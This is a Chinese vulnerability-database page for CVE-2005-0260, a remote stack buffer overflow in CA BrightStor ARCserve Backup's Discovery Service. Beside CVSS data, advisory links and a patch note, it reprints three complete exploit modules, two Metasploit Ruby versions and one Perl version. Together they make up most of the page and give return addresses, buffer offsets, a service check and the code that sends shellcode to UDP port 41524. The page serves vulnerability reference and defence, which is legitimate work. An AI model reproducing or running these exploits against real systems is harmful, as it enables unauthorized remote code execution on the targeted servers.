CVE-2005-0260
CVSS10.0
发布时间 :2005-05-02 00:00:00
修订时间 :2008-09-05 16:45:47
NMCOEP    

[原文]Stack-based buffer overflow in the Discovery Service for BrightStor ARCserve Backup 11.1 and earlier allows remote attackers to execute arbitrary code via a long packet to UDP port 41524, which is not properly handled in a recvfrom call.


[CNNVD]CA BrightStor ARCserve Backup远程缓冲区溢出漏洞(CNNVD-200505-711)

        Computer Associates BrightStor ARCserve Backup是多平台下的备份和恢复保护系统。Computer Associates BrightStor ARCserve Backup发现服务存在一个缓冲区溢出,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0260
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0260
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-711
(官方数据源) CNNVD

- 其它链接及资源

http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050209 Computer Associates BrightStor ARCserve Backup v11 Discovery Service Remote Buffer Overflow Vulnerability
http://supportconnectw.ca.com/public/enews/BrightStor/brigcurrent.asp#news1
(PATCH)  CONFIRM  http://supportconnectw.ca.com/public/enews/BrightStor/brigcurrent.asp#news1
http://xforce.iss.net/xforce/xfdb/19251
(UNKNOWN)  XF  brightstor-discovery-bo(19251)
http://securitytracker.com/id?1013138
(UNKNOWN)  SECTRACK  1013138
http://secunia.com/advisories/14183
(UNKNOWN)  SECUNIA  14183

- 漏洞信息

CA BrightStor ARCserve Backup远程缓冲区溢出漏洞
危急 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        Computer Associates BrightStor ARCserve Backup是多平台下的备份和恢复保护系统。Computer Associates BrightStor ARCserve Backup发现服务存在一个缓冲区溢出,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。

- 公告与补丁

        暂无数据

- 漏洞信息 (16406)

CA BrightStor Discovery Service Stack Buffer Overflow (EDBID:16406)
windows remote
2010-05-09 Verified
0 metasploit
N/A [点击下载]
##
# $Id: discovery_udp.rb 9263 2010-05-09 17:52:51Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA BrightStor Discovery Service Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in the CA BrightStor
				Discovery Service. This vulnerability occurs when a large
				request is sent to UDP port 41524, triggering a stack buffer
				overflow.
			},
			'Author'         => [ 'hdm', 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9263 $',
			'References'     =>
				[
					[ 'CVE', '2005-0260'],
					[ 'OSVDB', '13613'],
					[ 'BID', '12491'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 2048,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'cheyprod.dll 12/12/2003',
						{
							'Platform' => 'win',
							'Ret'      => 0x23808eb0, # call to edi reg
							'Offset'   => 968,
						},
					],
					[
						'cheyprod.dll 07/21/2004',
						{
							'Platform' => 'win',
							'Ret'      => 0x2380a908, # call edi
							'Offset'   => 970,
						},
					],
				],
			'DisclosureDate' => 'Dec 20 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(41524)
			], self.class)
	end

	def check

		# The first request should have no reply
		csock = Rex::Socket::Tcp.create(
			'PeerHost'  => datastore['RHOST'],
			'PeerPort'  => 41523,
			'Context'   =>
				{
					'Msf'        => framework,
					'MsfExploit' => self,
				})

		csock.put('META')
		x = csock.get_once(-1, 3)
		csock.close

		# The second request should be replied with the host name
		csock = Rex::Socket::Tcp.create(
			'PeerHost'  => datastore['RHOST'],
			'PeerPort'  => 41523,
			'Context'   =>
				{
					'Msf'        => framework,
					'MsfExploit' => self,
				})

		csock.put('hMETA')
		y = csock.get_once(-1, 3)
		csock.close

		if (y and not x)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect_udp

		print_status("Trying target #{target.name}...")

		buf = rand_text_english(4096)

		# Target 0:
		#
		# esp @ 971
		# ret @ 968
		# edi @ 1046
		# end = 4092

		buf[target['Offset'], 4] = [ target.ret ].pack('V')
		buf[1046, payload.encoded.length] = payload.encoded

		udp_sock.put(buf)
		udp_sock.recvfrom(8192)

		handler
		disconnect_udp
	end

end
		

- 漏洞信息 (F83122)

CA BrightStor Discovery Service Overflow (PacketStormID:F83122)
2009-11-26 00:00:00
H D Moore,patrick  metasploit.com
exploit,overflow,udp
CVE-2005-0260
[点击下载]

This Metasploit module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a large request is sent to UDP port 41524, triggering a stack overflow.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'CA BrightStor Discovery Service Overflow',
			'Description'    => %q{
				This module exploits a vulnerability in the CA BrightStor
				Discovery Service. This vulnerability occurs when a large
				request is sent to UDP port 41524, triggering a stack
				overflow.
			},
			'Author'         => [ 'hdm', 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-0260'],
					[ 'OSVDB', '13613'],
					[ 'BID', '12491'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 2048,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					[
						'cheyprod.dll 12/12/2003',
						{
							'Platform' => 'win',
							'Ret'      => 0x23808eb0, # call to edi reg
							'Offset'   => 968,
						},
					],
					[
						'cheyprod.dll 07/21/2004',
						{
							'Platform' => 'win',
							'Ret'      => 0x2380a908, # call edi
							'Offset'   => 970,
						},
					],					
				],
			'DisclosureDate' => 'Dec 20 2004',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(41524)
				], self.class)			
	end
	
	def check
	
		# The first request should have no reply
		csock = Rex::Socket::Tcp.create(
			'PeerHost'  => datastore['RHOST'],
			'PeerPort'  => 41523,
			'Context'   =>
				{
					'Msf'        => framework,
					'MsfExploit' => self,
				})
				
		csock.put('META')
		x = csock.get_once(-1, 3)
		csock.close
		
		# The second request should be replied with the host name
		csock = Rex::Socket::Tcp.create(
			'PeerHost'  => datastore['RHOST'],
			'PeerPort'  => 41523,
			'Context'   =>
				{
					'Msf'        => framework,
					'MsfExploit' => self,
				})
				
		csock.put('hMETA')
		y = csock.get_once(-1, 3)
		csock.close
		
		if (y and not x)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe	
	end
	
	def exploit
		connect_udp
	
		print_status("Trying target #{target.name}...")
				
		buf = rand_text_english(4096)

		# Target 0:
		#
		# esp @ 971
		# ret @ 968
		# edi @ 1046
		# end = 4092
	
		buf[target['Offset'], 4] = [ target.ret ].pack('V')
		buf[1046, payload.encoded.length] = payload.encoded
	
		udp_sock.put(buf)
		udp_sock.recvfrom(8192)
		
		handler
		disconnect_udp
	end

end
    

- 漏洞信息 (F36064)

brightstor.c (PacketStormID:F36064)
2005-02-18 00:00:00
Thor Doomen  
exploit,overflow,udp
CVE-2005-0260
[点击下载]

The CA BrightStor ArcServe Discovery Service overflow exploit takes advantage of a vulnerability in the CA BrightStor Discovery Service which occurs when a large request is sent to UDP port 41524, triggering a stack overflow.

- 漏洞信息 (F36062)

cabrightstor_disco.pm (PacketStormID:F36062)
2005-02-18 00:00:00
Thor Doomen  
exploit,overflow,udp,perl
windows,2k,32
CVE-2005-0260
[点击下载]

The CA BrightStor Discovery Service overflow exploit is a perl module exploits a vulnerability in the CA BrightStor Discovery Service which occurs when a large request is sent to UDP port 41524, triggering a stack overflow. Targets include Win32, win2000, winxp, and win2003. More information available here.

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::cabrightstor_disco;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'     => 'CA BrightStor Discovery Service Overflow',
	'Version'  => '$Revision: 1.10 $',
	'Authors'  => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
	'Arch'     => [ 'x86' ],
	'OS'       => [ 'win32', 'win2000', 'winxp', 'win2003' ],
	'Priv'     => 1,
	'AutoOpts' => { 'EXITFUNC' => 'process' },
	
	'UserOpts' => 
	{
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 41524],
	},

	'Payload' => 
	{
		'Space'     => 2048,
		'BadChars'  => "\x00",
		'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",	# add esp, -3500					
		'Keys'		=> ['+ws2ord'],
	},

	'Description'  => Pex::Text::Freeform(qq{
		This module exploits a vulnerability in the CA BrightStor
		Discovery Service. This vulnerability occurs when a large
		request is sent to UDP port 41524, triggering a stack
		overflow.
	}),

	'Refs'    => 
	[
		['BID',	'12491'],
		['CVE',	'2005-0260'],
		['URL',	'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'] 
	],
	
	'Targets' => 
	[
		['cheyprod.dll 12/12/2003', 0x23808eb0], # call to edi reg
	],
	
	'Keys'    => ['brightstor'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Check {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = 41523;

	# Connection #1 should not receive a response
	my $s = Msf::Socket::Tcp->new
	(
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
	);

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return $self->CheckCode('Connect');
	}

	$s->Send("META");
	my $res = $s->Recv(-1, 1);
	$s->Close;

	if ($res) {
		$self->PrintLine("[*] The discovery returned a strange response: $res");
	}

	# Connection #2 should receive the hostname of the target
	my $s = Msf::Socket::Tcp->new
	(
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
	);

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return $self->CheckCode('Connect');
	}

	$s->Send("hMETA");
	my $res = $s->Recv(-1, 1);
	$s->Close;

	if (! $res) {
		$self->PrintLine("[*] The discovery service did not respond to our query");
		return $self->CheckCode('Generic');
	}

	$self->PrintLine("[*] Discovery service active on host: $res");
	return $self->CheckCode('Detected');
}

sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target = $self->Targets->[$target_idx];

	$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

	my $s = Msf::Socket::Udp->new
	(
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
	);

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	my $bang = "X" x 4096;

	# esp @ 971
	# ret @ 968
	# edi @ 1046
	# end = 4092

	substr($bang, 968, 4, pack('V', $target->[1]));
	substr($bang, 1046, length($shellcode), $shellcode);

	$self->PrintLine("[*] Sending " .length($bang) . " bytes to remote host.");
	$s->Send($bang);
	$s->Recv(-1, 5);
	
	return;
}

1;
    

- 漏洞信息

13613
CA BrightStor ARCserve Backup Discovery Service Buffer Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

A remote overflow exists in BrightStor ARCserve Backup. The discovery service fails to properly check buffer boundries resulting in a stack overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2004-12-20 2004-12-11
2005-02-11 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Computer Associate has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站